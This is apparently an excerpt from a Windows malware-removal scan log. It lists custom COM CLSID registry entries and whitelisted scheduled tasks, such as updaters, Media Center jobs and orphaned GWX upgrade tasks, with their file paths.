CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{3D154A2D-D911-437E-A30C-5F56A9B7081D}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{42AEDC87-2188-41FD-B9A3-0C966FEABEC1}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{4315D437-5B8C-11D0-BD3B-00A0C911CE86}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{447AC255-CE81-43AD-9827-AFDDB1561B07}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{4DB26476-6787-4046-B836-E8412A9E8A27}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{4E77131D-3629-431C-9818-C5679DC83E81}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{505C2E67-8615-4CA9-9B57-48CF6EE696FD}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{50EF4544-AC9F-4A8E-B21B-8A26180DB13F}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{53BD6B4E-3780-4693-AFC3-7161C2F3EE9C}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{564FD788-86C9-4444-971E-CC4A243DA150}\InprocServer32 -> C:\Program Files\Free Codec Pack\Haali\Splitter.ax ()
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{5908297F-1B90-4C81-8B9D-CAFB1808C432}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{5DBB6D88-2B93-4F9E-BA90-2445304D67E9}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{603D3800-BD81-11D0-A3A5-00C04FD706EC}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{62BE5D10-60EB-11D0-BD3B-00A0C911CE86}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{632B606A-BBC6-11D2-A329-006097C4E476}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{637E3E39-462F-477E-9DAF-F07B9B1C00D2}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{640167B4-59B0-47A6-B335-A6B3C0695AEA}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{6746C347-576B-4F73-9012-CDFEEA251BC4}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{6A08CF80-0E18-11CF-A24D-0020AFD79767}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{6A2E0670-28E4-11D0-A18C-00A0C9118956}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{6BC1CFFA-8FC1-4261-AC22-CFB4CC38DB50}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{6E682784-1ECA-4CF2-988D-96B6E89E9A4D}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{70F598E9-F4AB-495A-99E2-A7C4D3D89ABF}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{71F96385-DDD6-48D3-A0C1-AE06E8B055FB}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{720D4AC0-7533-11D0-A5D6-28DB04C10000}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{725F645B-EAED-4FC5-B1C5-D9AD0ACCBA5E}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{72EB61E0-8672-4303-9175-F2E4C68B2E7C}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{76BE8257-C4C0-4D37-90C0-A23372254D27}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{7D8AA343-6E63-4663-BE90-6B80F66540A3}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{7E320092-596A-41B2-BBEB-175D10504EB6}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{7EFC002A-071F-4CE7-B265-F4B4263D2FD2}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{807C1E6C-1D00-453F-B920-B61BB7CDD997}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{807E5A10-4856-4F9A-8E3C-A1F7E75648B3}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{82C588E7-E54B-408C-9F8C-6AF9ADF6F1E9}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{84B5A313-CD5D-4904-8BA2-AFDC81C1B309}\InprocServer32 -> C:\Users\admin\AppData\Local\Citrix\GoToMeeting\3911\G2MOutlookAddin.dll (Citrix Online, a division of Citrix Systems, Inc.)
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{896664F7-12E1-490F-8782-C0835AFD98FC}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{89798CA1-701C-4633-B553-AC73E3424520}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{8D52AA2E-40BE-46D7-8F36-DB7B0F636824}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{8E849609-C7E8-4EC7-8BD3-D55E871A340D}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{9113A02D-00A3-46B9-BC5F-9C04DADDD5D7}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{91A52FB4-15AF-43A7-90C9-3A72DF68A01A}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{91A52FB8-15AF-43A7-90C9-3A72DF68A01A}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{934D4698-6A59-48F8-9F29-9FB30670320E}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{94E15FA1-68AF-4281-A67C-7D5A086169F2}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{9852A670-F845-491B-9BE6-EBD841B8A613}\InprocServer32 -> C:\Program Files\Free Codec Pack\vsfilter.dll (xy-VSFilter Team)
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{99D54F63-1A69-41AE-AA4D-C976EB3F0713}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{9AC9FBE1-E0A2-4AD6-B4EE-E212013EA917}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{9CFC2DF3-6BA3-46EF-A836-E519E81F0EC4}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{9DBD2C50-62AD-11D0-B806-00C04FD706EC}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{A4A1A128-768F-41E0-BF75-E4FDDD701CBA}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{A5AC04E7-3E13-48CE-A43F-9FBA59DB1544}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{A9B377B6-7D6F-4F37-B208-2AF6DC85E608}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{AB37E6C0-194D-4C33-A924-5178414DEB98}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{AB406AAC-2B2B-11D3-B36B-00C04F6108FF}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{AB9D6472-752F-43F6-B29E-61207BDA8E06}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{AF02484C-A0A9-4669-9051-058AB12B9195}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{AFB6C280-2C41-11D3-8A60-0000F81E0E4A}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{B056521A-9B10-425E-B616-1FCD828DB3B1}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{B155BDF8-02F0-451E-9A26-AE317CFD7779}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{B2952B16-0E07-4E5A-B993-58C52CB94CAE}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{B8967F85-58AE-4F46-9FB2-5D7904798F4B}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{BF87B6E1-8C27-11D0-B3F0-00AA003761C5}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{C1AB3D89-6973-45A6-AA44-09CEBBF872E5}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{C3043B13-E649-436A-9CE7-8DA8CB0BF7C8}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{C6E13344-30AC-11D0-A18C-00A0C9118956}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{C6E13360-30AC-11D0-A18C-00A0C9118956}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{C6E13370-30AC-11D0-A18C-00A0C9118956}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{CACAF262-9370-4615-A13B-9F5539DA4C0A}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{CDA42200-BD88-11D0-BD4E-00A0C911CE86}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{CF49D4E0-1115-11CE-B03A-0020AF0BA770}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{CFC399AF-D876-11D0-9C10-00C04FC99C8E}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{D23B90D0-144F-46BD-841D-59E4EB19DC59}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{D51BD5A1-7548-11CF-A520-0080C77EF58A}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{D51BD5A2-7548-11CF-A520-0080C77EF58A}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{D51BD5A3-7548-11CF-A520-0080C77EF58A}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{D58960BA-2EF3-4910-9E34-C911B1710180}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{D5DC4B7F-786B-42B7-B83B-FE1B5FC15E2C}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{D9B3211D-E57F-4426-AAEF-30A806ADD397}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{DB6EFB73-5153-43B7-8078-C6FFC4C0238C}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{DD0822FF-3A09-4BDC-B749-4B00B9115850}\InprocServer32 -> {592F0641-9468-D082-1796-5EA885889A47} => No File
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{DF0AD8E0-F91C-4109-AE46-1EAA5CD8AB08}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{DF0AD8E1-F91C-4109-AE46-1EAA5CD8AB08}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{DF0AD8E3-F91C-4109-AE46-1EAA5CD8AB08}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{E1F1A0B8-BEEE-490D-BA7C-066C40B5E2B9}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{E297AB5E-40B0-41BD-9E06-E4144084EE5F}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{E2FB4720-F45F-4A3C-8CB2-2060E12425C3}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{E30629D2-27E5-11CE-875D-00608CB78066}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{E3DC6D1E-50E6-469D-818E-CD3FE8E24CF6}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{E436EBB1-524F-11CE-9F53-0020AF0BA770}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{E436EBB2-524F-11CE-9F53-0020AF0BA770}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{E436EBB3-524F-11CE-9F53-0020AF0BA770}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{E436EBB5-524F-11CE-9F53-0020AF0BA770}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{E8E73B6B-4CB3-44A4-BE99-4F7BCB96E491}\InprocServer32 -> C:\Program Files\Free Codec Pack\LAVFilters\LAVAudio.ax (1f0.de - Hendrik Leppkes)
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{ED233797-F47D-475E-9FCA-3D549E4DDAA4}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{EDB5F444-CB8D-445A-A523-EC5AB6EA33C7}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{EE30215D-164F-4A92-A4EB-9D4C13390F9F}\InprocServer32 -> C:\Program Files\Free Codec Pack\LAVFilters\LAVVideo.ax (1f0.de - Hendrik Leppkes)
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{F562A2C8-E850-4F05-8E7A-E7192E4E6C23}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{F7FFE0A0-A4F5-44B5-949E-15ED2BC66F9D}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{FCC970B8-86D5-4A30-AC33-B76679BDF970}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{FE841493-835C-4FA3-B6CC-B4B2D4719848}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-4142771536-1505296934-324239511-1000_Classes\CLSID\{FF8F1D65-AD2B-47F1-9E71-66B7D35E3852}\InprocServer32 -> no filepath
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {007272BD-FBD2-4EE6-8816-F9FF19C3C66F} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> No File <==== ATTENTION
Task: {00AD8FFA-090C-4C17-983F-0543CDFDE3E0} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {07E10364-C6C3-432B-A044-DD86F35313B8} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {0937308A-C4AA-4619-865B-CB23424F4F08} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {0DB458F9-676B-47C6-8786-E010BD319DF3} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {16A563D0-793E-42E5-9E13-95EF017EE5D6} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\WINDOWS\ehome\mcupdate.exe
Task: {16D53BD7-FA47-4432-AFE3-705502A8E523} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {1C16BE4A-9F0E-4673-AF94-5E05D8482ACB} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {22071726-703B-44F5-A914-7FEF7BE0227D} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {295A8EE4-036E-40A8-9B6A-120F08E78C53} - System32\Tasks\OneDrive Standalone Update Task => C:\Users\admin\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe [2016-08-26] (Microsoft Corporation)
Task: {2ED2DEEE-53F3-4478-B993-FC25D586C6E8} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {2F5E383C-36A7-4F6C-8F80-3217FCB7A13C} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {303D4316-0D54-407E-A104-78A155B81B51} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: {30962FD8-6662-4450-9D4D-8B3A4CCBDC46} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {34AA23E2-3D11-4A1E-B17E-2732AC82E4F7} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {3B674D10-DC75-4E1F-BE5C-691DF1DB63C5} - System32\Tasks\update-S-1-5-21-4142771536-1505296934-324239511-1000 => C:\Program Files\Skillbrains\Updater\Updater.exe [2016-07-11] ()
Task: {408A0412-F65A-4F09-9322-31D9429728B3} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2016-09-16] (Adobe Systems Incorporated)
Task: {457A692C-BB87-47E9-B74F-F102E636E93F} - System32\Tasks\TrackerAutoUpdate => C:\Program Files\Tracker Software\Update\TrackerUpdate.exe [2016-04-19] (Tracker Software Products (Canada) Ltd.)
Task: {48FB8112-B453-4A13-9C75-500D58CFEB8D} - System32\Tasks\G2MUploadTask-S-1-5-21-4142771536-1505296934-324239511-1000 => C:\Users\admin\AppData\Local\Citrix\GoToMeeting\5573\g2mupload.exe [2016-09-19] (Citrix Online, a division of Citrix Systems, Inc.)
Task: {4E1F736B-902D-463C-933F-92624A138B95} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {4EEECABD-9D53-4B5E-A188-3677CBAF92BB} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {4F8F84DF-2BB4-461C-A7C6-4652979A2F95} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeReminderTime -> No File <==== ATTENTION
Task: {50B25D4C-C7A1-403F-9208-07AF636F2A1E} - System32\Tasks\{5EEB3375-C3D1-4791-877E-8148CF845808} => pcalua.exe -a C:\Users\admin\Downloads\chromeinstall-8u31.exe -d C:\Users\admin\Downloads
Task: {5296E596-FE5B-484E-AB3F-3EE9FD6623ED} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {5B67BF7B-B1A6-407A-B313-3678BEA482DD} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {5C3F8D2D-789F-4CB9-80A0-25CD3E03400E} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> No File <==== ATTENTION
Task: {5CE77FED-5846-46C4-BA00-C62A39DD3AA6} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files\Google\Update\GoogleUpdate.exe [2015-09-01] (Google Inc.)
Task: {5E7201A3-8E9C-4C2D-BEEC-46B52A8EE9F9} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\WINDOWS\ehome\MCUpdate.exe
Task: {66DDDA69-624A-40E3-BFE7-4055EB83ED25} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {67836EA4-408C-4A6A-828E-ECC33C37EDA6} - System32\Tasks\Seagate_Install_Launch => C:\Program Files\Seagate\Seagate Dashboard 2.0\Dashboard.exe
Task: {7702B901-F9A4-429E-93D5-549E30023EF4} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> No File <==== ATTENTION
Task: {7FAA2931-FD06-4FA6-A24B-76AB8F0C9837} - System32\Tasks\update-sys => C:\Program Files\Skillbrains\Updater\Updater.exe [2016-07-11] ()
Task: {7FAF7534-0270-408D-A569-0ECC5CD0A25B} - System32\Tasks\{B3F1563D-4865-44B3-957F-E221C7333D67} => pcalua.exe -a "C:\Program Files\Xilisoft\PowerPoint to Video Converter Free\Uninstall.exe"
Task: {856014DF-B930-4675-B7C7-FF9A4E10C59C} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> No File <==== ATTENTION
Task: {8C97BCBD-BBBC-4ED3-A9FD-F786CA9E2C36} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\WINDOWS\ehome\ehrec.exe
Task: {8F6777BD-9F41-4C0A-99DE-86DE4FBC0CA7} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {996AABA2-C818-4A4D-A78C-300EA56C45EE} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\WINDOWS\ehome\mcupdate.exe
Task: {A18B153C-9196-48C3-AE67-F450E199DAF2} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {A45DFC3C-08F1-47A5-9B3C-C9C3F3756A4E} - System32\Tasks\GoogleUpdateTaskMachineUA1d041dfa521745e => C:\Program Files\Google\Update\GoogleUpdate.exe [2015-09-01] (Google Inc.)
Task: {A4942907-6FB0-454E-BDAF-C4D4193AE14E} - System32\Tasks\G2MUpdateTask-S-1-5-21-4142771536-1505296934-324239511-1000 => C:\Users\admin\AppData\Local\Citrix\GoToMeeting\5573\g2mupdate.exe [2016-09-19] (Citrix Online, a division of Citrix Systems, Inc.)
Task: {AAF5E824-D870-4CE6-8196-5970E2299936} - \Microsoft\Windows\Setup\GWXTriggers\Logon-URT -> No File <==== ATTENTION
Task: {B6E78073-EAE3-4E68-9592-B70AB1858022} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\WINDOWS\ehome\ehrec.exe
Task: {D67B8012-6F59-4823-B626-3931B2E8F8C9} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files\Google\Update\GoogleUpdate.exe [2015-09-01] (Google Inc.)
Task: {D711982C-5900-4525-9BC7-3AEC337E12F7} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {DD4D595D-ADA8-4CE9-9794-97F95C5FBFED} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {E1835671-1132-4B97-B379-6FB17B41F33A} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {E5595236-4AD0-4879-AD75-6F8605F0211E} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {E76746BB-3924-4435-971A-2B0C65D3946B} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {E8C13231-8D0C-4DE8-B0DF-8BC0D2F77729} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2016-01-20] (Adobe Systems Incorporated)
Task: {F3A18C0B-ED9A-48D6-9517-4A2B601BFAD4} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {F8B01D94-F894-40F3-AD3C-51FE0509E910} - System32\Tasks\GoogleUpdateTaskMachineUA1d08f0476acbae7 => C:\Program Files\Google\Update\GoogleUpdate.exe [2015-09-01] (Google Inc.)
